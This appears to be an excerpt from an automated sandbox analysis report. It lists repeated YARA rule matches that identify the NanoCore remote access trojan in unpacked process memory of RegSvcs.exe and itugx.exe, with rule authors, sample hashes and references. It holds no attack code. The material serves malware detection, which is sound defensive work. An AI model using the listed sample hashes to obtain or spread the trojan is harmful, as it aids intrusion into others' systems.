      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
